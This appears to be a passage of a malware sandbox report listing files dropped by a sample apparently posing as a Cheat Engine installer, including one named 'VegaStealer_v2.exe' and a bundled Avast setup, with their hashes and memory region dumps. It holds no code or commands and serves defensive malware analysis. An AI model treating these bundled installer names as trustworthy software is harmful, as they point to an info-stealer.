                                      fac99bb8eaf0d4663d12a81d347c5350e87e5455

                                      SHA256

                                      59951a8cbd730e59d45b7a86b6825bc95529d6fb7c487c9c156b240891a224eb

                                      SHA512

                                      7ab75b5b4f87554268f90070c5403b5855f1cb15779748f21e4216770d1533370be7eacf31ae36a273ad08891adc958c898060ce1e07c627cc49b05eadb53780

                                    • C:\Windows\Temp\asw.c5208545c09f9ab5\part-prg_ais-15020997.vpx

                                      Filesize

                                      188KB

                                      MD5

                                      b898fa20bf9b0321b50a8d4946aae799

                                      SHA1

                                      4e173a99dc9a9ef507112857525ad53991f4d2a0

                                      SHA256

                                      6a2b3de2d13269bc9b3d68b7fbffd9edcfa94dea83ffd3d5f7a03f05bda09a6c

                                      SHA512

                                      c34e5b9f04c2322ec0ce24f582be148554ebff9aee8b312ba272b94b54f077370d345ec24d284ea66db67bd7104b343fa9c2646100d64d3b6361ab7ffe7e2810

                                    • C:\Windows\Temp\asw.c5208545c09f9ab5\part-setup_ais-15020997.vpx

                                      Filesize

                                      5KB

                                      MD5

                                      365b6ee6fbde00af486fc012251db2da

                                      SHA1

                                      8050ba5a9b6321f067fc694527011ba00767d4a2

                                      SHA256

                                      01fbb98a20ed29cd83e42351aa1fc361d4513b9ade8d71f62383bc76d5f86830

                                      SHA512

                                      949b877dc558a9215369fddce4bbeb3c0fbec09c1b92717a8d027001337743e300a1089ff46f3b49a33f4d6b4e7bb5a2d4cb6ea96c9114e308833c7e15d8b261

                                    • C:\Windows\Temp\asw.c5208545c09f9ab5\part-vps_windows-24123004.vpx

                                      Filesize

                                      11KB

                                      MD5

                                      300e04181b021f5128d096d5b27bce4a

                                      SHA1

                                      7cb56da8579956f4648f863af87688b8cf822a87

                                      SHA256

                                      a2a1c63c0462b03bf539395267f5674bc305b9ffe4b0547a9a6d2a223023db55

                                      SHA512

                                      360e2e07394b95efc583ad00c2093f3cdce804463b6da10a12be24a0f09c39414f72d475589c31260656067498f9ca0aad0320ad7fb3f52df918506a0debd8e0

                                    • C:\Windows\Temp\asw.c5208545c09f9ab5\prod-pgm.vpx

                                      Filesize

                                      571B

                                      MD5

                                      e966e55c5985d7f2ab33a9171b85bf6b

                                      SHA1

                                      21fe7414580a7ab0310aa8743553579e68573e52

                                      SHA256

                                      97938b707c9251ffbc5c5b0e05fb6061fd8cdd714d60e6b48593e59858df1c85

                                      SHA512

                                      33596e2ca9ba3bea43eb77db90f8691c3ba1b05b22b919ecc30323d2e8d528743c8851af93041f87feffc19ac43f6a37f4b0e8c2b9982975d31fbba6043991ac

                                    • C:\Windows\Temp\asw.c5208545c09f9ab5\prod-vps.vpx

                                      Filesize

                                      343B

                                      MD5

                                      bc9547e8f31a8128bb31230f9624c893

                                      SHA1

                                      b8496bffe37111ee8127cf8048eed0b013857b5c

                                      SHA256

                                      cbd2ad6c345f057360bb0543279f6b3c1ee37a62fd291d3a226c0d00aaf79426

                                      SHA512

                                      c9575dc27e6fc8229fc4124f1d5ce008003bd48b8e7660709e7b721a2be8123a9a2b9dbe56a5797390a802800edda054ba0e0d804651c9c0f9dec50820775f8e

                                    • C:\Windows\Temp\asw.c5208545c09f9ab5\servers.def

                                      Filesize

                                      29KB

                                      MD5

                                      46dcb43d6cf012d148e843bdd6dbb30f

                                      SHA1

                                      de6948ab39e15dc2fe9d64053a9d384deede7df3

                                      SHA256

                                      a447b543904d421e105e53eb8b58150dfdf98f3d1b882760f5fd5d1374041e2c

                                      SHA512

                                      e95d46b64591b8236dc592aadd5a9deb19e5687672081c6ebac0a7cebe19943b9708e21c83f686b0c5c37a8e34e8b3f48d80444874958d395df0a45c405aebaf

                                    • C:\Windows\Temp\asw.c5208545c09f9ab5\servers.def.vpx

                                      Filesize

                                      2KB

                                      MD5

                                      3645e173ccedd64a11197eea591e01b7

                                      SHA1

                                      7f5da709bd2ee1b763657f43a45b82fa71efd0ec

                                      SHA256

                                      6fff4292babcee0e804334e5f3faa7e5593f853283915bba4590896af160cf65

                                      SHA512

                                      0f2f8ece730b15568b8a1bf32c691304d34efc92673a2a44e048bdac0aa8db8eb5119e154528723a8ae412a00e734abbb60d5ad98620bc557af7383089374d04

                                    • C:\Windows\Temp\asw.c5208545c09f9ab5\setgui_x64_ais-997.vpx

                                      Filesize

                                      3.8MB

                                      MD5

                                      d9be57d4e1a25264b8317278f8b93396

                                      SHA1

                                      d3c98696582fed570f38ae45bf22b8197253b325

                                      SHA256

                                      a90e4ffa0fcd535733b6306d701cbb975245b8253df54b277970d8b8c1cf09c3

                                      SHA512

                                      2f13454c7e4360326f1dc417ad24e2d095b7178d89791f5b436d134c2fe26724bc48d6de1291208800b7c93dfe7082e8300b2d545c5db3e2590603dd3f8a5697

                                    • C:\Windows\Temp\asw.c5208545c09f9ab5\uat_2660.dll

                                      Filesize

                                      29KB

                                      MD5

                                      ffa717db56042a79b5546ee5ebe1719a

                                      SHA1

                                      d0e9681e55b6a20b184f556998eeaaeacc87e587

                                      SHA256

                                      af0096cf631c026e6b2de0382965ef9b797200a544d473aefcc19a8e6b86dc2a

                                      SHA512

                                      2c3f76a0644bcebeecb0e01127040921143065cc3dcaf90c363dafbe760733d70737296c8ae564dc83d3204d5052cd8e7bb5ccea3386f2c2f4e603608ee0a544

                                    • \Users\Admin\AppData\Local\Temp\3.exe

                                      Filesize

                                      3.5MB

                                      MD5

                                      a4c45aaf11fc601009a5682fd23790ee

                                      SHA1

                                      a8eac848583296b135af5a473fc8ce48af970b65

                                      SHA256

                                      d89c0e12b5fbbe103522fa152adb3edd6afff88d34d2bbf58caf28e9c4da0526

                                      SHA512

                                      cc735b14e4df0260c8302761e52fd84ba06310d2dde96c9089a8066f72b3b93d80c9e6548a18c35ecadd54479e99f80090ac31b7f30b682129b70b93095373a9

                                    • \Users\Admin\AppData\Local\Temp\CheatEngine75.exe

                                      Filesize

                                      28.6MB

                                      MD5

                                      ccef241f10766a2e12298fba4d319450

                                      SHA1

                                      955c0a80105b034ed46941845fc9bdbe8187ee64

                                      SHA256

                                      590d28762bc431046a202d7bbafb31f93fbbbc73a3c2291119b5c1139675b579

                                      SHA512

                                      d20a8f5afab8cd819ab81875ba9dba5c5ebb9ceadf4d53bf19e1e99c4f16d1361aa272f49571c69c6cc375afc8ac2f9c2e0293b5f2bf62f85cc5c23dfb3923f2

                                    • \Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll

                                      Filesize

                                      410KB

                                      MD5

                                      056d3fcaf3b1d32ff25f513621e2a372

                                      SHA1

                                      851740bca46bab71d0b1d47e47f3eb8358cbee03

                                      SHA256

                                      66b64362664030bff1596cda2ec5bd5df48cc7c8313c32f771db4aa30a3f86f9

                                      SHA512

                                      ce47c581538f48a46d70279a62c702195beacbfafb48a5a862b3922625fe56f6887d1679c6d9366f946d3d2124cb31c2a3eacbbd14d601ea56e66575cdf46180

                                    • \Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe

                                      Filesize

                                      7.7MB

                                      MD5

                                      9f4f298bcf1d208bd3ce3907cfb28480

                                      SHA1

                                      05c1cfde951306f8c6e9d484d3d88698c4419c62

                                      SHA256

                                      bf7057293d871cac087daab42daf22c1737a1df6adc7b7963989658f3b65f4cc

                                      SHA512

                                      4c763c3b6d4884f77083db5ccada59bc57803b3226294eff2ec3db8f2121ac01ee240b0e822cb090f5320ce40df545b477e323efabdbca31722731adc4b46806

                                    • \Users\Admin\AppData\Local\Temp\is-1UQH3.tmp\CheatEngine75.tmp

                                      Filesize

                                      3.1MB

                                      MD5

                                      e652d75d1d0d3f03b6b730e064e9194c

                                      SHA1

                                      c4220d57971c63a3f0b9f5b68560aedfdec18e64

                                      SHA256

                                      8958b8d498068bd0657587a04aaf011e7eabeb215276694366a154da8b55bdb9

                                      SHA512

                                      e5e5807224f0858d472584d06975dbe75677ad0a00727b63d1f8e2108dae179cb469ebae127be6c8d5b9de192bc741637fe1c8a9a4ef3ae46a3bde76b534a766

                                    • \Users\Admin\AppData\Local\Temp\is-84G9R.tmp\CheatEngine75.exe

                                      Filesize

                                      26.1MB

                                      MD5

                                      e0f666fe4ff537fb8587ccd215e41e5f

                                      SHA1

                                      d283f9b56c1e36b70a74772f7ca927708d1be76f

                                      SHA256

                                      f88b0e5a32a395ab9996452d461820679e55c19952effe991dee8fedea1968af

                                      SHA512

                                      7f6cabd79ca7cdacc20be8f3324ba1fdaaff57cb9933693253e595bfc5af2cb7510aa00522a466666993da26ddc7df4096850a310d7cff44b2807de4e1179d1a

                                    • \Users\Admin\AppData\Local\Temp\is-84G9R.tmp\zbShieldUtils.dll

                                      Filesize

                                      2.0MB

                                      MD5

                                      3037e3d5409fb6a697f12addb01ba99b

                                      SHA1

                                      5d80d1c9811bdf8a6ce8751061e21f4af532f036

                                      SHA256

                                      a860bd74595430802f4e2e7ad8fd1d31d3da3b0c9faf17ad4641035181a5ce9e

                                      SHA512

                                      80a78a5d18afc83ba96264638820d9eed3dae9c7fc596312ac56f7e0ba97976647f27bd86ea586524b16176280bd26daed64a3d126c3454a191b0adc2bc4e35d

                                    • \Users\Admin\AppData\Local\Temp\nse5C83.tmp\INetC.dll

                                      Filesize

                                      21KB

                                      MD5

                                      2b342079303895c50af8040a91f30f71

                                      SHA1

                                      b11335e1cb8356d9c337cb89fe81d669a69de17e

                                      SHA256

                                      2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f

                                      SHA512

                                      550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

                                    • \Users\Admin\AppData\Local\Temp\nse5FDE.tmp\Midex.dll

                                      Filesize

                                      126KB

                                      MD5

                                      581c4a0b8de60868b89074fe94eb27b9

                                      SHA1

                                      70b8bdfddb08164f9d52033305d535b7db2599f6

                                      SHA256

                                      b13c23af49da0a21959e564cbca8e6b94c181c5eeb95150b29c94ff6afb8f9dd

                                      SHA512

                                      94290e72871c622fc32e9661719066bafb9b393e10ed397cae8a6f0c8be6ed0df88e5414f39bc528bf9a81980bdcb621745b6c712f4878f0447595cec59ee33d

                                    • \Users\Admin\AppData\Local\Temp\nse5FDE.tmp\jsis.dll

                                      Filesize

                                      127KB

                                      MD5

                                      4b27df9758c01833e92c51c24ce9e1d5

                                      SHA1

                                      c3e227564de6808e542d2a91bbc70653cf88d040

                                      SHA256

                                      d37408f77b7a4e7c60800b6d60c47305b487e8e21c82a416784864bd9f26e7bb

                                      SHA512

                                      666f1b99d65169ec5b8bc41cdbbc5fe06bcb9872b7d628cb5ece051630a38678291ddc84862101c727f386c75b750c067177e6e67c1f69ab9f5c2e24367659f4

                                    • \Users\Admin\AppData\Local\Temp\nse5FDE.tmp\nsJSON.dll

                                      Filesize

                                      36KB

                                      MD5

                                      ddb56a646aea54615b29ce7df8cd31b8

                                      SHA1

                                      0ea1a1528faafd930ddceb226d9deaf4fa53c8b2

                                      SHA256

                                      07e602c54086a8fa111f83a38c2f3ee239f49328990212c2b3a295fade2b5069

                                      SHA512

                                      5d5d6ee7ac7454a72059be736ec8da82572f56e86454c5cbfe26e7956752b6df845a6b0fada76d92473033ca68cd9f87c8e60ac664320b015bb352915abe33c8

                                    • \Users\Admin\AppData\Local\Temp\nse5FDE.tmp\thirdparty.dll

                                      Filesize

                                      93KB

                                      MD5

                                      070335e8e52a288bdb45db1c840d446b

                                      SHA1

                                      9db1be3d0ab572c5e969fea8d38a217b4d23cab2

                                      SHA256

                                      c8cf0cf1c2b8b14cbedfe621d81a79c80d70f587d698ad6dfb54bbe8e346fbbc

                                      SHA512

                                      6f49b82c5dbb84070794bae21b86e39d47f1a133b25e09f6a237689fd58b7338ae95440ae52c83fda92466d723385a1ceaf335284d4506757a508abff9d4b44c

                                    • \Windows\Temp\asw.ab65a09faa6d20cc\avast_free_antivirus_setup_online_x64.exe

                                      Filesize

                                      10.6MB

                                      MD5

                                      8eec0ee6397333ca6f713bf3e0e7b5d6

                                      SHA1

                                      8a5dbfcc02a20d2f4b7a099824a2d7f8c4f905a0

                                      SHA256

                                      3c614946477c4b9ccfe06dd91289d1fc68b0c238450945608f6b6250145c6f95

                                      SHA512

                                      04df7b1449300ffe43ef44d86c1ccfffc2e95240837642a763a45f31d0890a1f96f89ca234586d4bef2efd1f0d53ad22043c1541f04ff10965c4a191c69ca8c6

                                    • memory/768-47-0x0000000000400000-0x00000000004D8000-memory.dmp

                                      Filesize

                                      864KB

                                    • memory/768-290-0x0000000000400000-0x00000000004D8000-memory.dmp

                                      Filesize

                                      864KB

                                    • memory/768-1197-0x0000000000400000-0x00000000004D8000-memory.dmp

                                      Filesize

                                      864KB

                                    • memory/1368-1140-0x0000000000400000-0x00000000004D8000-memory.dmp

                                      Filesize

                                      864KB

                                    • memory/1368-483-0x0000000000400000-0x00000000004D8000-memory.dmp

                                      Filesize

                                      864KB

                                    • memory/1520-267-0x000000001B4C0000-0x000000001B7A2000-memory.dmp

                                      Filesize

                                      2.9MB

                                    • memory/1520-268-0x00000000003C0000-0x00000000003C8000-memory.dmp

                                      Filesize

                                      32KB

                                    • memory/1580-316-0x0000000140000000-0x00000001407F4000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/1580-1323-0x0000000140000000-0x00000001407F4000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/1580-1214-0x0000000140000000-0x00000001407F4000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/1580-372-0x0000000140000000-0x00000001407F4000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/1580-1181-0x0000000140000000-0x00000001407F4000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/1580-1793-0x0000000140000000-0x00000001407F4000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/1580-1721-0x0000000140000000-0x00000001407F4000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/1580-1299-0x0000000140000000-0x00000001407F4000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/1580-1784-0x0000000140000000-0x00000001407F4000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/1580-315-0x00000000000B0000-0x00000000000D0000-memory.dmp

                                      Filesize

                                      128KB

                                    • memory/1580-1363-0x0000000140000000-0x00000001407F4000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/1580-1199-0x0000000140000000-0x00000001407F4000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/1580-320-0x0000000140000000-0x00000001407F4000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/1580-321-0x0000000140000000-0x00000001407F4000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/1580-1532-0x0000000140000000-0x00000001407F4000-memory.dmp

                                      Filesize

                                      8.0MB

                                    • memory/1660-281-0x000000013FD50000-0x00000001400E2000-memory.dmp

                                      Filesize

                                      3.6MB

                                    • memory/1660-269-0x000000013FD50000-0x00000001400E2000-memory.dmp

                                      Filesize

                                      3.6MB

                                    • memory/1768-44-0x0000000000400000-0x0000000002BF8000-memory.dmp

                                      Filesize

                                      40.0MB

                                    • memory/2120-1180-0x0000000140000000-0x0000000140016000-memory.dmp

                                      Filesize

                                      88KB

                                    • memory/2120-319-0x0000000140000000-0x0000000140016000-memory.dmp

                                      Filesize

                                      88KB

                                    • memory/2276-275-0x000000001B580000-0x000000001B862000-memory.dmp

                                      Filesize

                                      2.9MB

                                    • memory/2276-276-0x0000000002730000-0x0000000002738000-memory.dmp

                                      Filesize

                                      32KB

                                    • memory/2656-101-0x00000000006E0000-0x0000000000700000-memory.dmp

                                      Filesize

                                      128KB

                                    • memory/2656-51-0x00000000010C0000-0x000000000110A000-memory.dmp

                                      Filesize

                                      296KB

                                    • memory/2656-65-0x0000000000C90000-0x0000000000D22000-memory.dmp

                                      Filesize

                                      584KB

                                    • memory/2656-96-0x00000000055F0000-0x0000000005658000-memory.dmp

                                      Filesize

                                      416KB

                                    • memory/2660-1758-0x000007FEF3190000-0x000007FEF44BB000-memory.dmp

                                      Filesize

                                      19.2MB

                                    • memory/2660-1785-0x000007FEF3190000-0x000007FEF44BB000-memory.dmp

                                      Filesize

                                      19.2MB

                                    • memory/2660-1826-0x000007FEF3190000-0x000007FEF44BB000-memory.dmp

                                      Filesize

                                      19.2MB

                                    • memory/2660-1617-0x000007FEF3190000-0x000007FEF44BB000-memory.dmp

                                      Filesize

                                      19.2MB

                                    • memory/2788-314-0x000000013F2F0000-0x000000013F682000-memory.dmp

                                      Filesize

                                      3.6MB

                                    • memory/2788-307-0x000000013F2F0000-0x000000013F682000-memory.dmp

                                      Filesize

                                      3.6MB

                                    • memory/2804-291-0x0000000000400000-0x000000000071C000-memory.dmp

                                      Filesize

                                      3.1MB

                                    • memory/2804-1165-0x0000000003750000-0x0000000003890000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/2804-1179-0x0000000000400000-0x000000000071C000-memory.dmp

                                      Filesize

                                      3.1MB

                                    • memory/2804-299-0x0000000003750000-0x0000000003890000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/2804-304-0x0000000003750000-0x0000000003890000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/2804-306-0x0000000000400000-0x000000000071C000-memory.dmp

                                      Filesize

                                      3.1MB

                                    • memory/2804-1194-0x0000000000400000-0x000000000071C000-memory.dmp

                                      Filesize

                                      3.1MB

                                    • memory/2804-325-0x0000000003750000-0x0000000003890000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/2804-329-0x0000000003750000-0x0000000003890000-memory.dmp

                                      Filesize

                                      1.2MB

                                    • memory/2804-336-0x0000000000400000-0x000000000071C000-memory.dmp

                                      Filesize

                                      3.1MB

                                    • memory/2804-1195-0x0000000000400000-0x000000000071C000-memory.dmp

                                      Filesize

                                      3.1MB

                                    • memory/2912-1139-0x0000000000400000-0x000000000071B000-memory.dmp

                                      Filesize

                                      3.1MB